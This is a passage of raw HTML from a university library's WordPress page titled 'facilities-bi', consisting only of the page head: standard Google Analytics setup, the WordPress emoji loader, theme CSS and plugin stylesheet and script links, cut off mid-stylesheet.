CINXE.COM
facilities-bi – ptsl
<!DOCTYPE html> <html class="html" lang="en-US"> <head> <meta charset="UTF-8"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>facilities-bi – ptsl</title> <meta name='robots' content='max-image-preview:large' /> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel='dns-prefetch' href='//use.fontawesome.com' /> <link rel="alternate" type="application/rss+xml" title="ptsl » Feed" href="https://www.ukm.my/ptsl/?feed=rss2" /> <link rel="alternate" type="application/rss+xml" title="ptsl » Comments Feed" href="https://www.ukm.my/ptsl/?feed=comments-rss2" /> <!-- This site uses the Google Analytics by MonsterInsights plugin v9.2.2 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script src="//www.googletagmanager.com/gtag/js?id=G-C4EM2W17NL" data-cfasync="false" data-wpfc-render="false" async></script> <script data-cfasync="false" data-wpfc-render="false"> var mi_version = '9.2.2'; var mi_track_user = true; var mi_no_track_reason = ''; var MonsterInsightsDefaultLocations = {"page_location":"https:\/\/www.ukm.my\/ptsl\/?page_id=256"}; if ( typeof MonsterInsightsPrivacyGuardFilter === 'function' ) { var MonsterInsightsLocations = (typeof MonsterInsightsExcludeQuery === 'object') ? MonsterInsightsPrivacyGuardFilter( MonsterInsightsExcludeQuery ) : MonsterInsightsPrivacyGuardFilter( MonsterInsightsDefaultLocations ); } else { var MonsterInsightsLocations = (typeof MonsterInsightsExcludeQuery === 'object') ? MonsterInsightsExcludeQuery : MonsterInsightsDefaultLocations; } var disableStrs = [ 'ga-disable-G-C4EM2W17NL', ]; /* Function to detect opted out users */ function __gtagTrackerIsOptedOut() { for (var index = 0; index < disableStrs.length; index++) { if (document.cookie.indexOf(disableStrs[index] + '=true') > -1) { return true; } } return false; } /* Disable tracking if the opt-out cookie exists. */ if (__gtagTrackerIsOptedOut()) { for (var index = 0; index < disableStrs.length; index++) { window[disableStrs[index]] = true; } } /* Opt-out function */ function __gtagTrackerOptout() { for (var index = 0; index < disableStrs.length; index++) { document.cookie = disableStrs[index] + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStrs[index]] = true; } } if ('undefined' === typeof gaOptout) { function gaOptout() { __gtagTrackerOptout(); } } window.dataLayer = window.dataLayer || []; window.MonsterInsightsDualTracker = { helpers: {}, trackers: {}, }; if (mi_track_user) { function __gtagDataLayer() { dataLayer.push(arguments); } function __gtagTracker(type, name, parameters) { if (!parameters) { parameters = {}; } if (parameters.send_to) { __gtagDataLayer.apply(null, arguments); return; } if (type === 'event') { parameters.send_to = monsterinsights_frontend.v4_id; var hookName = name; if (typeof parameters['event_category'] !== 'undefined') { hookName = parameters['event_category'] + ':' + name; } if (typeof MonsterInsightsDualTracker.trackers[hookName] !== 'undefined') { MonsterInsightsDualTracker.trackers[hookName](parameters); } else { __gtagDataLayer('event', name, parameters); } } else { __gtagDataLayer.apply(null, arguments); } } __gtagTracker('js', new Date()); __gtagTracker('set', { 'developer_id.dZGIzZG': true, }); if ( MonsterInsightsLocations.page_location ) { __gtagTracker('set', MonsterInsightsLocations); } __gtagTracker('config', 'G-C4EM2W17NL', {"forceSSL":"true","link_attribution":"true"} ); window.gtag = __gtagTracker; (function () { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ /* ga and __gaTracker compatibility shim. */ var noopfn = function () { return null; }; var newtracker = function () { return new Tracker(); }; var Tracker = function () { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = function () { var args = Array.prototype.slice.call(arguments); args.unshift('send'); __gaTracker.apply(null, args); }; var __gaTracker = function () { var len = arguments.length; if (len === 0) { return; } var f = arguments[len - 1]; if (typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function') { if ('send' === arguments[0]) { var hitConverted, hitObject = false, action; if ('event' === arguments[1]) { if ('undefined' !== typeof arguments[3]) { hitObject = { 'eventAction': arguments[3], 'eventCategory': arguments[2], 'eventLabel': arguments[4], 'value': arguments[5] ? arguments[5] : 1, } } } if ('pageview' === arguments[1]) { if ('undefined' !== typeof arguments[2]) { hitObject = { 'eventAction': 'page_view', 'page_path': arguments[2], } } } if (typeof arguments[2] === 'object') { hitObject = arguments[2]; } if (typeof arguments[5] === 'object') { Object.assign(hitObject, arguments[5]); } if ('undefined' !== typeof arguments[1].hitType) { hitObject = arguments[1]; if ('pageview' === hitObject.hitType) { hitObject.eventAction = 'page_view'; } } if (hitObject) { action = 'timing' === arguments[1].hitType ? 'timing_complete' : hitObject.eventAction; hitConverted = mapArgs(hitObject); __gtagTracker('event', action, hitConverted); } } return; } function mapArgs(args) { var arg, hit = {}; var gaMap = { 'eventCategory': 'event_category', 'eventAction': 'event_action', 'eventLabel': 'event_label', 'eventValue': 'event_value', 'nonInteraction': 'non_interaction', 'timingCategory': 'event_category', 'timingVar': 'name', 'timingValue': 'value', 'timingLabel': 'event_label', 'page': 'page_path', 'location': 'page_location', 'title': 'page_title', 'referrer' : 'page_referrer', }; for (arg in args) { if (!(!args.hasOwnProperty(arg) || !gaMap.hasOwnProperty(arg))) { hit[gaMap[arg]] = args[arg]; } else { hit[arg] = args[arg]; } } return hit; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = newtracker; __gaTracker.getByName = newtracker; __gaTracker.getAll = function () { return []; }; __gaTracker.remove = noopfn; __gaTracker.loaded = true; window['__gaTracker'] = __gaTracker; })(); } else { console.log(""); (function () { function __gtagTracker() { return null; } window['__gtagTracker'] = __gtagTracker; window['gtag'] = __gtagTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.ukm.my\/ptsl\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); </script> <link rel='stylesheet' id='hfe-widgets-style-css' href='https://www.ukm.my/ptsl/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=1.6.46' media='all' /> <style id='wp-emoji-styles-inline-css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <style id='classic-theme-styles-inline-css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='wpah-front-styles-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wp-accessibility-helper/assets/css/wp-accessibility-helper.min.css?ver=0.5.9.4' media='all' /> <link rel='stylesheet' id='wpvrfontawesome-css' href='https://use.fontawesome.com/releases/v6.5.1/css/all.css?ver=8.5.8' media='all' /> <link rel='stylesheet' id='panellium-css-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/css/pannellum.css?ver=1' media='all' /> <link rel='stylesheet' id='videojs-css-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/css/video-js.css?ver=1' media='all' /> <link rel='stylesheet' id='videojs-vr-css-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/videojs-vr/videojs-vr.css?ver=1' media='all' /> <link rel='stylesheet' id='owl-css-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/css/owl.carousel.css?ver=8.5.8' media='all' /> <link rel='stylesheet' id='wpvr-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/css/wpvr-public.css?ver=8.5.8' media='all' /> <link rel='stylesheet' id='eac-frontend-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor-addon-components/assets/css/eac-frontend.min.css?ver=2.2.8' media='all' /> <link rel='stylesheet' id='eac-fancybox-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor-addon-components/assets/css/jquery.fancybox.min.css?ver=3.5.7' media='print' onload="this.onload=null;this.media='all'" /> <link rel='stylesheet' id='hfe-style-css' href='https://www.ukm.my/ptsl/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.css?ver=1.6.46' media='all' /> <link rel='stylesheet' id='elementor-icons-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.32.0' media='all' /> <link rel='stylesheet' id='elementor-frontend-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='swiper-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5' media='all' /> <link rel='stylesheet' id='e-swiper-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='elementor-post-9-css' href='https://www.ukm.my/ptsl/wp-content/uploads/elementor/css/post-9.css?ver=1726017316' media='all' /> <link rel='stylesheet' id='cpel-language-switcher-css' href='https://www.ukm.my/ptsl/wp-content/plugins/connect-polylang-elementor/assets/css/language-switcher.min.css?ver=2.4.5' media='all' /> <link rel='stylesheet' id='widget-image-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='widget-heading-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-heading.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='widget-text-editor-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-text-editor.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='widget-divider-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-divider.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='widget-social-icons-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='e-apple-webkit-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/conditionals/apple-webkit.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='elementor-post-256-css' href='https://www.ukm.my/ptsl/wp-content/uploads/elementor/css/post-256.css?ver=1730971446' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/fonts/fontawesome/css/all.min.css?ver=6.4.2' media='all' /> <link rel='stylesheet' id='simple-line-icons-css' href='https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/css/third/simple-line-icons.min.css?ver=2.4.0' media='all' /> <link rel='stylesheet' id='oceanwp-style-css' href='https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/css/style.min.css?ver=4.0.2' media='all' /> <link rel='stylesheet' id='hfe-icons-list-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css?ver=3.24.3' media='all' /> <link rel='stylesheet' id='hfe-social-icons-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.24.0' media='all' /> <link rel='stylesheet' id='hfe-social-share-icons-brands-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='hfe-social-share-icons-fontawesome-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='hfe-nav-menu-icons-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='eael-general-css' href='https://www.ukm.my/ptsl/wp-content/plugins/essential-addons-for-elementor-lite/assets/front-end/css/view/general.min.css?ver=6.0.10' media='all' /> <link rel='stylesheet' id='google-fonts-1-css' href='https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CPlayfair+Display%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CPT+Sans%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.7.1' media='all' /> <link rel='stylesheet' id='elementor-icons-shared-0-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='elementor-icons-fa-brands-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='elementor-icons-fa-solid-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.3' media='all' /> <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><!--n2css--><!--n2js--><script src="https://www.ukm.my/ptsl/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=9.2.2" id="monsterinsights-frontend-script-js" async data-wp-strategy="async"></script> <script data-cfasync="false" data-wpfc-render="false" id='monsterinsights-frontend-script-js-extra'>var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,pdf,ppt,zip,xls,docx,pptx,xlsx","inbound_paths":"[{\"path\":\"\\\/go\\\/\",\"label\":\"affiliate\"},{\"path\":\"\\\/recommend\\\/\",\"label\":\"affiliate\"}]","home_url":"https:\/\/www.ukm.my\/ptsl","hash_tracking":"false","v4_id":"G-C4EM2W17NL"};</script> <script src="https://www.ukm.my/ptsl/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script src="https://www.ukm.my/ptsl/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/js/pannellum.js?ver=1" id="panellium-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/js/libpannellum.js?ver=1" id="panelliumlib-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/js/video.js?ver=1" id="videojs-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/videojs-vr/videojs-vr.js?ver=1" id="videojsvr-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/js/videojs-pannellum-plugin.js?ver=1" id="panelliumvid-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/js/owl.carousel.js?ver=6.7.1" id="owl-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/js/jquery.cookie.js?ver=1" id="jquery_cookie-js"></script> <link rel="https://api.w.org/" href="https://www.ukm.my/ptsl/index.php?rest_route=/" /><link rel="alternate" title="JSON" type="application/json" href="https://www.ukm.my/ptsl/index.php?rest_route=/wp/v2/pages/256" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.ukm.my/ptsl/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.7.1" /> <link rel="canonical" href="https://www.ukm.my/ptsl/?page_id=256" /> <link rel='shortlink' href='https://www.ukm.my/ptsl/?p=256' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://www.ukm.my/ptsl/index.php?rest_route=%2Foembed%2F1.0%2Fembed&url=https%3A%2F%2Fwww.ukm.my%2Fptsl%2F%3Fpage_id%3D256" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://www.ukm.my/ptsl/index.php?rest_route=%2Foembed%2F1.0%2Fembed&url=https%3A%2F%2Fwww.ukm.my%2Fptsl%2F%3Fpage_id%3D256&format=xml" /> <meta name="generator" content="Elementor 3.25.9; features: additional_custom_breakpoints, e_optimized_control_loading; settings: css_print_method-external, google_font-enabled, font_display-auto"> <style>.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <style> .e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } @media screen and (max-height: 1024px) { .e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } } @media screen and (max-height: 640px) { .e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } } </style> <style id="wp-custom-css"> /** Start Block Kit CSS:71-3-d415519effd9e11f35d2438c58ea7ebf **/.envato-block__preview{overflow:visible}/** End Block Kit CSS:71-3-d415519effd9e11f35d2438c58ea7ebf **//** Start Block Kit 